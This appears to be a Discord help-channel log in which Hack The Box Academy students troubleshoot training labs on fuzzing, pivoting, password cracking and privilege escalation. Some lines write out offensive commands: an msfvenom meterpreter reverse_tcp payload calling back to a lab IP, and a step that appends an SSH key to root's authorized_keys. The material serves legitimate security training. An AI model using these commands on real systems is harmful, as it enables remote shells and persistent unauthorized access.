sudo sed -i 's/^#.*$//g' /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt && sudo sed -i '/^$/d' /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
that should remove any commented lines from the start of the text file.
providing that is where your actual Seclist folder resides. On my VM I do not have /opt/useful. My seclists is in /usr/share/wordlists/
yeah just double checked it. that filepath is fine and the document is definitely there
but i'm getting 87k checks which doesn't take forever but no results
I was getting RDP disconnects on a few sections last night, but switching to the US VPN fixed it
https://academy.hackthebox.com/module/115/section/1105 is not working to spawn any target machines that respond
does anybody else have this problem?
i've respawned it so many times already
always dont connect or ping
vpn maintenance is probably ongoing
Is this the part where we're removing the comments off?
Hey everyone, I haven't been paying attention when I complete modules, is there a way to see what, if any, boxes are recommended to hack after each module is completed?
PASSWORD ATTACKS
what lists to use to guess the name and password at the beginning of the module? i am using top-usernames-shortlist.txt and rockyou-20.txt but something is taking too long! usually the rules say that the bust during training should not be longer than 30 minutes.
Check the Resources at the top, they give you a zip file with wordlists to use
You can start each module and then click the Finish button again at the end. Then you should see the boxes of the respective module.
yeah it says fuzz the /blog directory. so i did extension fuzzing to confirm .php and now it's find hidden pages
@polar widget yeah like i dunno what i'm doing wrong. probably a random typo but i'm copy/pasting strings and double checking they're in the directories the lesson says they are
if anyone can help me troubleshoot i'd appreciate it
This is the most brilliant idea I've ever come up with! I didn't even see that link! Thank you!😆
np!
Anyone who could guide me a little bit
hey guys im in last section of the attacking web apps with ffuf module
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:30556/
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.4.1-dev
________________________________________________
:: Method : GET
:: URL : https://FUZZ.academy.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
:: Progress: [4989/4989] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 4989 ::
for some reason, i get all errors when i simply try to find subdomains, what am i doing wrong?
no spoilers i'm on that now haha
i didnt spoil anything
i just finished the section i'm on . turns out ffuf really wants a full window otherwise it FREAKS out. did the exact same command i've been using but tried with a full window and it finally worked
i know just saying sometimes people will talk about things here instead of dm's
ok
Do a port scan. What ports do you find? Which applications are running on the ports?
yup did that already & checked for possible exploits on MSf
could you explain a bit more in dm @acoustic owl
====
Hello guys, I am stuck at this.
Any hints?
@rich mulch check what group the secaudit user is part of, then run a find command to find files part of that group
The flag is hidden in a log file 🙂
@unique valve Hey! I have the same problem. Can I DM you about Dynamic Port Forwarding with SSH and SOCKS Tunneling?
Sure! 🙂
is it in /var/log? I did read all file log in there, but found nothing
its in an ||apache log||
Hey All, AD Enumeration and Attacks Skills Assessment 2 - I'm stuck on the "Locate a config file containing a MSSQL connection string" task. Any help or push in the right direction on where to locate that config file?
awww, I did read this file but not carefully = =!
@timber tide Try using ||snaffler.exe|| 🙂
Thanks, will give it a try
Any help with: Web Attacks -- Bypassing Security Filters -- Second Question | Am I supposed to use the reset.php for this? It just keeps deleting everything and giving me the same flag I got from first part
@tiny ledge try making a POST to index.php
You mean /admin/index.php or just IP:PORT/index.php
EDIT: Tried again and it worked, thanks! Got the flag
Module pivoting, tunneling and port forwarding: section meterpreter tunneling and port forwarding: I can't execute any meterpreter payload on the ubuntu target. I've tried x64, x86, meterpreter_reverse_tcp, meterpreter/reverse_tcp, etc, but all I get when executing it is Segmentation fault (Core dumped) The msf handler catch the session, but it instantly closes.
thank you!
@sweet heron if you're getting a seg fault, on the machine catching the shell, it's buggy, its overwriting the wrong memory space. Is Msf up to date?
I'll try updating, but should be. It segment fault on the target, not my host.
Did anyone find the MySQL credentials for the Password Attacks - Password Reuse / Default Passwords? I found the answer but it was not on the target. Used a resource listed in the sections reading and was wondering if that was intended or not.
I believe that's intended
OK, I'm having issues. My VPN connection doesn't work after an update of my kali VM. It connects ok, I've got the same usual IP, but can't ssh any target. Also, usually I'm able to go on the internet with the VPN on, but not anymore (i know about default route). I've tried fresh VPN file, same problem. Any server down ?
Have you tried alternating between US and EU vpn keys?
Try changing 'cipher AES-128-CBC' in your .ovpn file to 'data-ciphers AES-128-CBC'
already corrected.
I can't even connect to EU, it times out. It looks like the update change something, but I've got no idea how to find the problem...
Main platform VPNs time out too. Did the update break openvpn (reinstall doesn't help) or break some config (but which?)? I'm on kali 5.18.5-1 in a VM.
whats your openvpn version?
2.6.0
It's actually 2.6_git for some reason.
? did you clone and make from github?
not at all.
ya try rolling it back, or a different repo
yo
need help on the Active Directory Enumeration & Attacks
with this question... the other questions was kinda easy but this makes no sense
"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"
@sweet heron well looks like mine is broken now too, I just updated my ubuntu, now im getting openvpn errors
could it be due to the vpn maintenance HTB was running yesterday?
@iron plaza that's likely. Anyone else having vpn issues?
a lot of people complained yesterday and I saw the maintenance banner on the site
ahaa
Damn... And I can't seem to install openvpn from the tarball. Getting missing elements (lzo, PAM). Guess I'll try again tomorrow.
well looks like another day of break I guess
ya definitely is a problem on HTB side, it's showing incorrect vpn status
heck even the pwnboxes in the academy modules are not working ... mine is still saying "instance is starting..." for the past 5 min
ya, the instances aren't working either, so looks like all of it is having networking issues
is there a mod or HTB staff that can notify us when the VPN issue is resolved?
Dunno, I don't see any update on twitter, and I don't see one on the regular page or academy page
seems vpn is working guys
they did something different, but it's still not establishing a connection for me
i connected to the EU server
probably
vip eu is still down for me
most likely they are making the rounds for all levels of vpn
think this has anything to do with the ubuntu 22 dist upgrade today?
if their openvpn servers run ubuntu that might be why
i am running kali and did an upgrade yesterday and faced the same issue so it is mostly an openvpn config on HTB's side
if it takes longer than tonight i hope they shoot us an update
i started to think some giga chad hacked the entire platform as opposed to the pwn boxes
I mean it's probably possible, and I'm sure they'd love someone to test it to point out possible bugs or security issues
Can someone please help me with the flag5 SQLMAP Essential modules?
@iron plaza is your eu connection really working?
yes i am on it right now try to finish some unsolved questions
mind you i am using the 2.6_git version of openvpn
so maybe their openvpn server updates are kicking back 2.5.5 client connections
someone else earlier was using 2.6git and had similar connection issues
yea saw the message, and i was using 2.5.6 and had no connection. But when i reinstalled openvpn i got the 2.6_git version
did you install through apt?
hm, i did a reinstall a couple hours ago and it gave me 2.5.5 again
do apt and apt-get have separate repos?
@coral heath sry mate not ignoring you, having connection issues
they use the same source
@iron plaza thought it did. just did apt-get, still got 2.5.5
Repositories are defined in /etc/apt/sources.list so perhaps ubuntu didnt roll it out?
im so confused, openvpn's latest build is 2.5.7
I have a bad feeling that this is going to be an issue for just me
i just checked the site and yea 2.5.7 is the latest ... so where the hell did i get 2.6 from
maybe they rolled it out on apt before they updated their page, but weirdly their github doesn't seem like it updated to 2.6 either
not sure why sqlmap essential modules I found flag5 tables but it keeps saying unable to retrieve the number of columns
2.6 is referenced on their community page as "next up"
oh, weird so looks like it's dying after trying to add IPv6 to tun0, 'permission denied', did my ipv6 permissions reset with the dist?
oh wouldnt be able to say
@iron plaza Hallelujah!
it was my upgrade, I guess it disables the /proc/ settings to =1 by standard
was that it ... the ipv6 permission?
@iron plaza Yup that was it. A similar issue in 2020 in the HTB forums showed the correct enable method
why do i feel like this was a needle in the haystack moment
lol right? @iron plaza I appreciate the help, I would've just sat and waited like a chump without your help
i highly doubt i helped at all
lol, helped enough. We narrowed it down to an issue on my end
that solution though was something so difficult to come up with considering the problem was not usual
yup, lots of changes today. If someone comes around later, they can "cat /proc/sys/net/ipv6/conf/all/disable_ipv6 ", and if it shows "1", they just need to "$ sudo sysctl net.ipv6.conf.all.disable_ipv6=0" to fix it
i'm sure I'm not the only one using ubuntu
hey guys im in last section of the attacking web apps with ffuf module
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:30556/
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.4.1-dev
________________________________________________
:: Method : GET
:: URL : https://FUZZ.academy.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
:: Progress: [4989/4989] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 4989 ::
for some reason, i get all errors when i simply try to find subdomains, what am i doing wrong?
@pliant summit I'm trying it now, getting errors too
oh , is there something wrong with the module?
dunno, i'm gonna pop into the mod real quick and check
oh wait did you add the machine to your /etc/hosts?
it won't scan ".academy.htb" correctly if it doesn't route properly
Yea I did
Yea, idk maybe we can ping the creator of the module?
hey can anyone help with the Skills Assessment - Using Web Proxies
cant seem to enable the button.
ive tried intercepting the response and altering the post form data but i cant seem to get the button to work.
@pliant summit I gotchu bud
for a vhost enumeration you need to set the -H to alter the headers sent
so you're not fuzzing with -u "http://FUZZ.wahtever.htb"
you'll use -H "HOST: FUZZ" -u http://academy.htb:<port>
you'll get a whole bunch, so you'll have to filter by size or words or lines to find the right subs
@rustic sage I'll see if i can help
thank you
i just got it thank you!
@rustic sage good deal, lol I wasn't fast enough
no worries i feel kinda dumb for asking lol
@rustic sage lol np
Can anyone assist with broken Authentication : Predictable Reset Token? I have created the script and using it but it doesn't seem to be working correctly..I am unsure
Oh thanks bro, gonna try once I’m home
DM me
@lethal atlas I think I might have gotten it but ty! Sorry!
np
is there an issue with vpn again?
lemme check
i connected to the box but when i ping the ip it shows 100% packet loss
thanks
yeah i get dummy packet loss too
i restarted the vpn session and machine ... still the same thing, I connect to the vpn but the target machine ip when pinged gives me 100% packet loss
whats the solution, wait it out?
idk lmao
Hi, I am working on FILE UPLOAD ATTACKS- Limited File Uploads. And I really need help in that. I have no idea where to start. I have done all the previous ones and knows them well. Thanks for any help.
File uploads?
Can anyone nudge me on Cross-Site Scripting skills assessment?
how long does it usually take for someone to finish the junior pentester path from start to finish?
For each module, an approximate time is given as to how long it will take to complete.
ok, would i be able to start doing htb boxes after doing the path you think?
Yes, provided you really understood the content, you are guaranteed to be able to solve HTB boxes afterwards.
Feel free to DM me
module 77 section 843 (Getting Started, Public Exploits)
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file.
searchsploit http://x.x.x.x:y/
[*] exec: searchsploit http://x.x.x.x:y/
Exploits: No Results
Shellcodes: No Results
in msfconsole^^^
searchsploit searches exploitdb
So you'd do
searchsploit wordpress
Not the IP
Search the names of services running on the server
it fucking doesn't work
it shows a ton of names and other things
and when I accessed the ip+port in the browser
I didn't get a domain
simply the ip and the port

Oh dear, this one was nasty
I too tried just everything, enabling something while disabling something else, manually inserting those tags and such,
It just doesn't work that way,
We gotta ||remove|| something
You need to Try to identify the services running on the server
which WP modules can you find? anything else of interest?
Yes
Wordpress is like Windows; it's a system where you can run many plugins and other code inside it
some of those plugins might be old
also that
hello
hello
im a beginner
can u tell where to start

what is a WP module first of all
WordPress module
it's an addition to the website, created by potentially somebody else
ctrl+u?
e.g. a webshop or a feedback button
like hyperlinks?
no
wordpress is a Content Management System, i.e. a system that translates your input content in to a website - like a blog, where you don't need to upload HTML to add a new page, but just click "create new blog post" and WordPress does the rest
okay
WP also allows you to install modules or plugins. These are components made by WP or by other people
wp is an acronym for wordpress
So where WordPress might help you build a blog out of the box without anything else installed, it won't help you build a webshop
yes
There's a few ways, but I don't know if they are the intended ways for you right here and now
@high zinc pls tell me how to start
then how am I supposed to pass the test
There's a whole Academy Module (course) about hacking wordpress, so I'm thinking what you're looking for is much less complicated
ok thanks
but I need to go past this section
I am simply stuck here and afterall I need to get the content of the /flag.txt
if I would've known the website domain so I can use searchsploit
searchsploit doesn't search websites, it searches for product names like "Microsoft Word" or "Discord"
ok for this particular test @pallid breach what you gotta do is open the website and read
A large part of hacking is not to run tools and push buttons, it's reading and analysing what you are presented with
just a small issue i've on first Privilege Escalation
question number2 said when you gain access to user2 try to escalate root privileges
i've found the id_rsa and id_rsa with wrong permission so i've copied both files, i've tried to ssh to local 80 port where ssh daemon is running but when i'm trying to connect to this service
Load key "/home/user2/id_rsa.pub": invalid format
md5sum is the same 😦
then I should use searchsploit Getting Started
but i don't know how the product name
Try to figure out what searchsploit does first
i've tried to generate new pubkey with ssh-keygen -f id_rsa -y >id_rsa.pub
binvalid format 😦
someone could dm me for help 😦
"Then, we can use searchsploit to search for a specific application by its name..."
OK, so you're looking for the name of an application
searchsploit is more or less a fresh copy of https://www.exploit-db.com/
hi there fellas
i am having trouble with an exercise from the hashcat module
the exercise on page 'hybrid mode'
ive been using the given mask as a suffix and a prefix and trying each hash type that comes up in hashid
but it doesn't find anything
i let it go for about 2 minutes, the hint says it should take 90 seconds
i feel like i am doing something wrong
I searched it on youtube
and still doesn't work
I am sick of this
DM
We'll figure it out
I'm stuck on it as well. The webserver is too slow and unstable. Restarted so many times and still cant get a stable shell. no matter reverse or other pivots
Hey 🙂
anyone know what is looking for with that the only one I'm missing. From the module Intro to analyze network traffic.
What addressing mechanism is used at the link layer of the TCP/IP model?
SMB 10.129.202.136 445 WINSRV CASSIE READ,WRITE
empty file Flag.txt?
password attacks
why?
where is the mistake 😦 Load key "id_rsa": error in libcrypto
i'm stuck :(((((((((
ok done sry 🙂
hey guys , i am stuck @https://academy.hackthebox.com/module/20/section/113 hashcat module cracking common hashes, i tried all possible hash types with rockyou.txt and up to 10000 random rules , no luck
i tried md5,md4,NTLM
Can someone explain how Tornado payloads work for server side injection module? I cant get tplmap to compile correctly using HTB's steps and. When I curl using the example payload it doesn't get an error but it doesn't work either (same as what's shown in the payload)
Need some help with Command Injection - Skills assessment. Just can't get that thing to work. Found the injection point but i can't really seem to successfully inject anything really even though i belive i am bypassing the filters correctly. Would be grateful for some helps 😩
DM me
I had issues compiling when I placed in the /opt but when I put it in a folder I had write permission on it worked fine.
DM me and I can look at your command.
🤔 I will definitely try that, thanks!
yo
need help on the Active Directory Enumeration & Attacks
with this question... the other questions was kinda easy but this makes no sense
"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"
DM
Try to change the directory where you dowload the file
Currently working the "initial enumeration of the domain" section of the active directory enumeration & attacks module, but when attempting to run wireshark like the lesson documents, I get this:
Unable to run wireshark as sudo as well. This is while connected to the student mention via xfreerdp as the lesson mentions
anyone available to help me with the ffuf skills assessment?
@quiet prism what's the problem?
i've got the sub-domains and extensions
they're in my /etc/hosts file
am i just running a recursive scan and filtering out 403 errors?
it says pages, have you tried visiting in a browser?
oh wait i see, ya so after doing the extension identification, do a normal recursive, ya
ya you got it
if you saw the hint don't get confused, the "use :PORT" is just for your answer, as the port per instance always changes
yeah the hint threw me ok. so i've got 3 sub-domains, so 3 recursive scans yeah?
yup
by adding the sub-domains to etc/hosts doesn't it automatically scan them?
no, if i remember right you can specify an option to scan multiple subs
it will go through one sub, then the other, etc. It'll take a while too
eugh 😢 i flew through this not sure why the skills assessment is suddenly giving me problems. doesn't help pwnbox keeps dropping connection so i have to go and update /etc/hosts xD
ya apparently since update theres been connection issues. It might be worth spooling up parrot or kali on a vm just to do this challenge, so you won't drop connection
Btw, anyone know where I'm supposed to put questions related to regular boxes or challenges? the #welcome says ask in HTB:Platform but I don't see it in the channel list
So HTB:Platform is a category, which holds the different chatrooms for challenges, boxes, battlegrounds, etc
It should be right below HTB:Academy and above HTB:Multi-Machine Labs
Huh, ya not here
neither is HTB:Multi-Machine Labs
HTB: community help
academy
business ctf 2022
offtopic / serious discussion
hmm, only other thing i can think of, did you verify your htb account?
I think so, pretty sure I did, thought I had to to chat
Hmm, might need to enlist a mod for that one
Do i just dm one? I've not bothered em before
yeah i've got a vm i'm comfortable with it's just so easy to open up a pwnbox xD
forgot to remove commented text from file zzz
@quiet prism aha, good deal. Ya pwnbox is nice
how is this NOT the right url
@quiet prism how far did you recurse?
1
think i need to go to 2
hey can anyone give me some help with fuzzing a cookie? im having some issues determining where to place the payload.
@rustic sage Which module are you on, and which section?
Skills Assessment - Using Web Proxies
OK
dunno
spammed asking to get banned so I granted their wish 😄
@high zinc😆
yeah feels like it. just would be nice if i could be bothered to ignore the code 200 and 300 stuff. i only need the 403s i think xD
@quiet prism you can set the -fc to ignore multiple status codes
yeah i'm actually reading the help page while the scan runs. almost done now xD
@rustic sage Oh I know where you're at. You need to tack on an alphanumeric at the end of this md5 hash, then decode, rinse and repeat
You can script something or just do it manually
@quiet prism nice 👍 Ya I really liked that mod, I learned a bunch about ffuf, and its good the tool is extremely intuitive and easy to use
yeah tbh really enjoying. i've completely become obsessed with this cyber security stuff the last month
@rustic sage btw, I remember that specific challenge, but I don't remember what specific module or section that is, if you're having trouble remember to let people know where exactly you're at so they can look into it and help
@quiet prism good, stick with it, it only gets more rewarding and fun!
its the using web proxies module
career change incoming haha
so ive decoded the cookie to the 31 char. it said to, ive sent it to intruder and place the payload here ive tried multiple locations and cant seem to figure this one out. when i click start i get nothing but ok 200 responses. am i putting the payload in the wrong position?
or am i going about this the wrong way ?
using web proxies : skills assessment
@rustic sage The correct md5 cookie has 32 characters, it's missing the last character
its asking you to figure out what the last one is
i get that part. what im failing at is the position of the payload. do i add a space in the decoded cookie and then run the payload ?
@rustic sage I'll jump back to it and look
thanks i appreciate it!!
wouldn't hurt to start there i imagine, i'm not seeing a help chat
@rustic sage Np. I'm going through it now
@drifting glacier Yup I figured it, turns out I'd never verified my account with discord
Nice!
well "I" meaning a moderator helped me ;p
So hashcat is currently not cracking the hashes I've pulled in the same module im currently working on, attacking active directory. Running it on the machine the lesson says to ssh into, but it just shows an exhausted status and quits
While on kali, i get illegal hardware instruction, although i think that error is meaning i need to use a bash shell instead of zsh
Nope that's not it, still getting illegal instruction lol
@upper vault good god what a process this is xD
Hi, I am currently on the XSS module section 'Phishing' for the question to get the cubes I am supposed to send a url that injects a login form to SERVER_IP/phishing/send.php , My problem is, I have a url that successfully completes the assignment (I get the login credentials in the creds.txt file when I 'test' login through the url) but all the page tells me is 'Issue in sending URL!'. I have tried to URL decode the url and send that but then the url is invalid. What am I supposed to do here?
I recently completed this one, If I remember correctly it would help you to look at other parameters in the responses apart from 200 OK etc, differences in lengths of the responses could also mean something
@quiet prism Ya this one is kinda involved, I'm gonna have to do a refresher on this tonight
@rustic sage sry m8 I haven't done that mod yet
yea thats what ive been looking at the response length. i dont think i have the correct payload position. im getting the same response length for them as well
I am not sure how specific I can be on answers as I don't want to break any 'spoiling' rules, but are you currently putting the payload in the cookie? and to create a complete cookie, you would have to add a prefix to the contents of the fuzzing list (add the 31 char string as prefix in the burp intruder) after which you have to encode the whole 32 char strings with the scheme you have deduced in the previous exercise.
yo
can i dm you ?
ready
on my pc? my friend said to install to start learning pentesting
how to install packages and stuff
Yeah sure, never explained any of this stuff but no problem giving it a try!
3
2
1
connection refused but it's DEFINITELY in my /etc/hosts
AHHHHH 😢
how is this not working. i had to have access to the sub-domains to scan. now when i send a curl request it's saying connection refused xD
sod it. watched a youtube video. did EXACTLY what they did but something is wrong with pwnbox or the vpn... not sure but it's done now xD and I know what i'm doing
Can someone please help me with sqlmap essential the flag 7 ?
@quiet prism lol, ya sometimes there's just connection issues, whenever i get burnt out I leave it alone, do something else, and come back to it in a day or two
Hi! Still stuck at pivoting module, meterpreter port forwarding section. I can't execute the payload on the ubuntu target. I get a Segmentation fault (core dumped). Any hint on how to diagnose the problem? I already tried different payloads and ports and my system is up to date.
My payload: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.78 -f elf -o backup LPORT=9999
I knew exactly what I was doing. Just connection issues wasn’t letting it work so I “cheated” the last question. 😂 bed. Tomorrow SQLmap essentials.
@quiet prism 👍
@sweet heron sry m8 i haven't done that module, but seg faults can occur when you lack read or write permissions somewhere
Thanks anyway. I'm doing the exact same command from the module, so it should work.
looks more like its hanging or bugged, if you had to kill your payload twice, then 3rd time just crashed on its own
@sweet heron ya, sry, sometimes it just takes playing with everything till something jenky works. Just spent 4 hours on a starting point box, found out my spacing between some commands was off, and that was enough to break the whole thing
Executing with sudo just outputs Segmentation fault (no core dumped anymore).
seg fault / core dump same thing
well "same thing"
ya either it's lacking a permission to read or write somewhere, or its overwriting/overflowing memory somewhere till it dies
could be worth looking for other payloads
@sweet heron I'm actually surprised you're using proxychains, i've never been able to get it to work for me
i just got it to work yesterday
id recommend looking at the networkchuck vid on it
he explains it a bit more clearly
@rustic sage well I will do just that, thanks!
I remember not being able to get the proxy option of msf to work. Proxychains worked better in my very short experience.
Im stuck at getting started
Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.
im stuck at this part
Let us copy key.pub, then on the remote machine, we will add it into /root/.ssh/authorized_keys:
user@remotehost$ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
how do i use this command?
and then i dont get how to use the vim id_rsa and where to find it so i can chmod 600 it
so i copied the id_rsa with vim from the root system but how can i use it?
Module pivoting... section chisel: I can't execute chisel from the target after building it and uploading it. libc.so.6 not found. This other user reported it two days ago.
I'm in the skill assessment part for sqlmap essentials... could anyone please help me with this?
sure, DM
Hey there could I talk to somebody about a nudge on Trick?
There is a room for it in HTB:PLATFORM section on the left panel. You can also DM 😉
Oh! Haha just got back from a huuuge break from pentesting and this discord so i see that it has changed a little and this is the channel i left off at.
Thanks!
Having another error running a program on the ubuntu box of the pivoting module, ptunnel section this time. I think the target is broken. I'll try contacting support tomorrow I guess.
ok, Ima newbie, but I know for a fact some of these answers to the questions in the Linux Fundamentals are straight up wrong. I find the "correct answers" in a walkthrough, and that command isnt in a proper context or a switch doesnt really exist.... am I missing something? Did the Parrot tool modules update and the lab doesnt match the material anymore? I feel weird adding to erratum if its really me.
I’ve done the linux module and I’m pretty sure everything is 100% tbh
What specifically is wrong with it???
na you are right, sometimes the questions seem so vague that you are led to think in the different directions... faced that myself in the starting modules
hey
There's a padding of vagueness in that module, it's done in order for the individual to explore the possibilities, experiment with those possibilities and arrive at the relevant answer.
This is a very critical skill to be developed over time, you may ask why? That's because often times we'll have to troubleshoot the environment we're working with, whether it's the attacking box or inside the target host. Tools might not work, and you have to be careful with the choice of commands as well.
Generally, till that point I would run ABC command to directly get XYZ result, but I cared less about other information it yielded, like PQR which could be useful.
You know these encounters build our experiences. Embrace it. Have fun!
Anyone able to give me a sanity check on Attacking Enterprise Networks - Post Exploitation? For the life of me I cannot get the double pivot to work.
hey, can someone please assist me with the footprinting medium lab? ||I have mounted the NFS share, but when I try to get into the TechSupport directory, I get "permission denied". Not sure how to proceed.|| edit am dumb lol
@west canopy Dm if you still need help
guys how do i verify for the main channel? the dm i get is empty. guess i should do something about it but idk what
Did you mount with sudo?
wheres the HTB beginner chat at
damn why i aint got access to that
Read the steps in #welcome
ohh i gotta verify
